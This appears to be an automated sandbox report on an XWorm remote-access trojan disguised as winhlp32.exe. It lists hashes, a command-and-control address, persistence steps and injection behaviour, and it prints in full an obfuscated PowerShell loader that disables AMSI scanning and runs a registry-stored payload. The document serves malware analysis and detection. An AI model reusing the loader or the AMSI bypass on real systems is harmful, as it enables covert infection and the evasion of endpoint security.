Overview
overview
10Static
static
10fr2nnk.exe
windows10-1703-x64
10fr2nnk.exe
windows7-x64
10fr2nnk.exe
windows10-2004-x64
10fr2nnk.exe
windows11-21h2-x64
10grab.exe
windows10-1703-x64
10grab.exe
windows7-x64
7grab.exe
windows10-2004-x64
8grab.exe
windows11-21h2-x64
8m2zen.exe
windows10-1703-x64
7m2zen.exe
windows7-x64
7m2zen.exe
windows10-2004-x64
7m2zen.exe
windows11-21h2-x64
7winhlp32.exe
windows10-1703-x64
10winhlp32.exe
windows7-x64
10winhlp32.exe
windows10-2004-x64
10winhlp32.exe
windows11-21h2-x64
10Analysis
-
max time kernel
30s -
max time network
27s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
11-05-2024 09:52
Behavioral task
behavioral1
Sample
fr2nnk.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
fr2nnk.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
fr2nnk.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
fr2nnk.exe
Resource
win11-20240426-en
Behavioral task
behavioral5
Sample
grab.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
grab.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
grab.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral8
Sample
grab.exe
Resource
win11-20240508-en
Behavioral task
behavioral9
Sample
m2zen.exe
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
m2zen.exe
Resource
win7-20231129-en
Behavioral task
behavioral11
Sample
m2zen.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
m2zen.exe
Resource
win11-20240508-en
Behavioral task
behavioral13
Sample
winhlp32.exe
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
winhlp32.exe
Resource
win7-20240419-en
Behavioral task
behavioral15
Sample
winhlp32.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
winhlp32.exe
Resource
win11-20240419-en
General
-
Target
winhlp32.exe
-
Size
205KB
-
MD5
a83dc22ef14c6b5d96aaee00b10a4973
-
SHA1
ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
-
SHA256
143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
-
SHA512
0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
-
SSDEEP
6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd
Malware Config
Extracted
xworm
3.0
147.185.221.18:41012
-
Install_directory
%AppData%
-
install_file
Agent.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\System32\x4L.exe family_xworm behavioral13/memory/1676-14-0x00000000009D0000-0x00000000009E8000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2080 created 584 2080 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 4912 powershell.exe 5048 powershell.exe 4856 powershell.exe -
Drops startup file 2 IoCs
Processes:
x4L.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk x4L.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk x4L.exe -
Executes dropped EXE 2 IoCs
Processes:
x4L.exex4Shellcode.exepid process 1676 x4L.exe 656 x4Shellcode.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
x4L.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4L = "C:\\Users\\Admin\\AppData\\Roaming\\x4L.exe" x4L.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 7 IoCs
Processes:
winhlp32.exepowershell.EXEsvchost.exedescription ioc process File created C:\Windows\System32\x4L.exe winhlp32.exe File opened for modification C:\Windows\System32\x4L.exe winhlp32.exe File created C:\Windows\System32\x4Shellcode.exe winhlp32.exe File opened for modification C:\Windows\System32\x4Shellcode.exe winhlp32.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\x4L svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2080 set thread context of 4424 2080 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1588 timeout.exe -
Modifies data under HKEY_USERS 42 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepowershell.exepowershell.exepid process 2080 powershell.EXE 2080 powershell.EXE 2080 powershell.EXE 2080 powershell.EXE 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4912 powershell.exe 4912 powershell.exe 4424 dllhost.exe 4424 dllhost.exe 4912 powershell.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4912 powershell.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 5048 powershell.exe 5048 powershell.exe 4424 dllhost.exe 4424 dllhost.exe 5048 powershell.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
winhlp32.exex4L.exepowershell.EXEdllhost.exepowershell.exesvchost.exedescription pid process Token: SeDebugPrivilege 2772 winhlp32.exe Token: SeDebugPrivilege 1676 x4L.exe Token: SeDebugPrivilege 2080 powershell.EXE Token: SeDebugPrivilege 2080 powershell.EXE Token: SeDebugPrivilege 4424 dllhost.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeIncreaseQuotaPrivilege 4912 powershell.exe Token: SeSecurityPrivilege 4912 powershell.exe Token: SeTakeOwnershipPrivilege 4912 powershell.exe Token: SeLoadDriverPrivilege 4912 powershell.exe Token: SeSystemProfilePrivilege 4912 powershell.exe Token: SeSystemtimePrivilege 4912 powershell.exe Token: SeProfSingleProcessPrivilege 4912 powershell.exe Token: SeIncBasePriorityPrivilege 4912 powershell.exe Token: SeCreatePagefilePrivilege 4912 powershell.exe Token: SeBackupPrivilege 4912 powershell.exe Token: SeRestorePrivilege 4912 powershell.exe Token: SeShutdownPrivilege 4912 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeSystemEnvironmentPrivilege 4912 powershell.exe Token: SeRemoteShutdownPrivilege 4912 powershell.exe Token: SeUndockPrivilege 4912 powershell.exe Token: SeManageVolumePrivilege 4912 powershell.exe Token: 33 4912 powershell.exe Token: 34 4912 powershell.exe Token: 35 4912 powershell.exe Token: 36 4912 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2204 svchost.exe Token: SeIncreaseQuotaPrivilege 2204 svchost.exe Token: SeSecurityPrivilege 2204 svchost.exe Token: SeTakeOwnershipPrivilege 2204 svchost.exe Token: SeLoadDriverPrivilege 2204 svchost.exe Token: SeSystemtimePrivilege 2204 svchost.exe Token: SeBackupPrivilege 2204 svchost.exe Token: SeRestorePrivilege 2204 svchost.exe Token: SeShutdownPrivilege 2204 svchost.exe Token: SeSystemEnvironmentPrivilege 2204 svchost.exe Token: SeUndockPrivilege 2204 svchost.exe Token: SeManageVolumePrivilege 2204 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2204 svchost.exe Token: SeIncreaseQuotaPrivilege 2204 svchost.exe Token: SeSecurityPrivilege 2204 svchost.exe Token: SeTakeOwnershipPrivilege 2204 svchost.exe Token: SeLoadDriverPrivilege 2204 svchost.exe Token: SeSystemtimePrivilege 2204 svchost.exe Token: SeBackupPrivilege 2204 svchost.exe Token: SeRestorePrivilege 2204 svchost.exe Token: SeShutdownPrivilege 2204 svchost.exe Token: SeSystemEnvironmentPrivilege 2204 svchost.exe Token: SeUndockPrivilege 2204 svchost.exe Token: SeManageVolumePrivilege 2204 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2204 svchost.exe Token: SeIncreaseQuotaPrivilege 2204 svchost.exe Token: SeSecurityPrivilege 2204 svchost.exe Token: SeTakeOwnershipPrivilege 2204 svchost.exe Token: SeLoadDriverPrivilege 2204 svchost.exe Token: SeSystemtimePrivilege 2204 svchost.exe Token: SeBackupPrivilege 2204 svchost.exe Token: SeRestorePrivilege 2204 svchost.exe Token: SeShutdownPrivilege 2204 svchost.exe Token: SeSystemEnvironmentPrivilege 2204 svchost.exe Token: SeUndockPrivilege 2204 svchost.exe Token: SeManageVolumePrivilege 2204 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2204 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
x4L.exepid process 1676 x4L.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
winhlp32.execmd.exepowershell.EXEdllhost.exedescription pid process target process PID 2772 wrote to memory of 1676 2772 winhlp32.exe x4L.exe PID 2772 wrote to memory of 1676 2772 winhlp32.exe x4L.exe PID 2772 wrote to memory of 656 2772 winhlp32.exe x4Shellcode.exe PID 2772 wrote to memory of 656 2772 winhlp32.exe x4Shellcode.exe PID 2772 wrote to memory of 656 2772 winhlp32.exe x4Shellcode.exe PID 2772 wrote to memory of 2508 2772 winhlp32.exe cmd.exe PID 2772 wrote to memory of 2508 2772 winhlp32.exe cmd.exe PID 2508 wrote to memory of 1588 2508 cmd.exe timeout.exe PID 2508 wrote to memory of 1588 2508 cmd.exe timeout.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 2080 wrote to memory of 4424 2080 powershell.EXE dllhost.exe PID 4424 wrote to memory of 584 4424 dllhost.exe winlogon.exe PID 4424 wrote to memory of 640 4424 dllhost.exe lsass.exe PID 4424 wrote to memory of 728 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 908 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 992 4424 dllhost.exe dwm.exe PID 4424 wrote to memory of 344 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 488 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1028 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1044 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1120 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1244 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1260 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1284 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1308 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1320 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1388 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1468 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1500 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1560 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1568 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1656 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1668 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1756 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1764 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1904 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 1948 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2032 4424 dllhost.exe spoolsv.exe PID 4424 wrote to memory of 1848 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2204 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2244 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2444 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2452 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2484 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2668 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2676 4424 dllhost.exe sihost.exe PID 4424 wrote to memory of 2704 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2732 4424 dllhost.exe sysmon.exe PID 4424 wrote to memory of 2748 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2792 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2808 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 2908 4424 dllhost.exe taskhostw.exe PID 4424 wrote to memory of 2980 4424 dllhost.exe unsecapp.exe PID 4424 wrote to memory of 3268 4424 dllhost.exe svchost.exe PID 4424 wrote to memory of 3432 4424 dllhost.exe Explorer.EXE PID 4424 wrote to memory of 3980 4424 dllhost.exe RuntimeBroker.exe PID 4424 wrote to memory of 1836 4424 dllhost.exe DllHost.exe PID 4424 wrote to memory of 4920 4424 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3c93cbca-c388-412d-9e86-0a98270fdb6b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nDUStEyOEoDE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dcocxxPjKXPMlg,[Parameter(Position=1)][Type]$tujwgjBWYM)$wLLsXGudaWF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'emo'+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+'yD'+'e'+'le'+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'bli'+[Char](99)+''+','+'Se'+[Char](97)+'l'+'e'+'d,'+[Char](65)+'n'+[Char](115)+''+'i'+'Cla'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$wLLsXGudaWF.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+'e'+'c'+''+'i'+''+'a'+''+'l'+'N'+'a'+'me'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$dcocxxPjKXPMlg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+'n'+'a'+[Char](103)+''+'e'+'d');$wLLsXGudaWF.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+','+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$tujwgjBWYM,$dcocxxPjKXPMlg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $wLLsXGudaWF.CreateType();}$AthxnCPlhrpvW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'of'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'32.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+'a'+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$LnIyJBpOVUdTEW=$AthxnCPlhrpvW.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+'roc'+'A'+'d'+'d'+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gwxcFusGicLbCZAARsj=nDUStEyOEoDE @([String])([IntPtr]);$GKiBLqkdSBMzElWfVAPIkF=nDUStEyOEoDE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cbEhRGZoqMf=$AthxnCPlhrpvW.GetMethod(''+'G'+''+'e'+'tM'+'o'+'d'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$AovqupOiUrFImA=$LnIyJBpOVUdTEW.Invoke($Null,@([Object]$cbEhRGZoqMf,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$EqQnNaRrlFmfnMMOX=$LnIyJBpOVUdTEW.Invoke($Null,@([Object]$cbEhRGZoqMf,[Object](''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$CyVEfCH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AovqupOiUrFImA,$gwxcFusGicLbCZAARsj).Invoke('am'+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$wfaMtRrcfYjkxVXdn=$LnIyJBpOVUdTEW.Invoke($Null,@([Object]$CyVEfCH,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+'B'+'u'+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$MFUskHYIQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EqQnNaRrlFmfnMMOX,$GKiBLqkdSBMzElWfVAPIkF).Invoke($wfaMtRrcfYjkxVXdn,[uint32]8,4,[ref]$MFUskHYIQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wfaMtRrcfYjkxVXdn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EqQnNaRrlFmfnMMOX,$GKiBLqkdSBMzElWfVAPIkF).Invoke($wfaMtRrcfYjkxVXdn,[uint32]8,0x20,[ref]$MFUskHYIQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'x'+'4'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
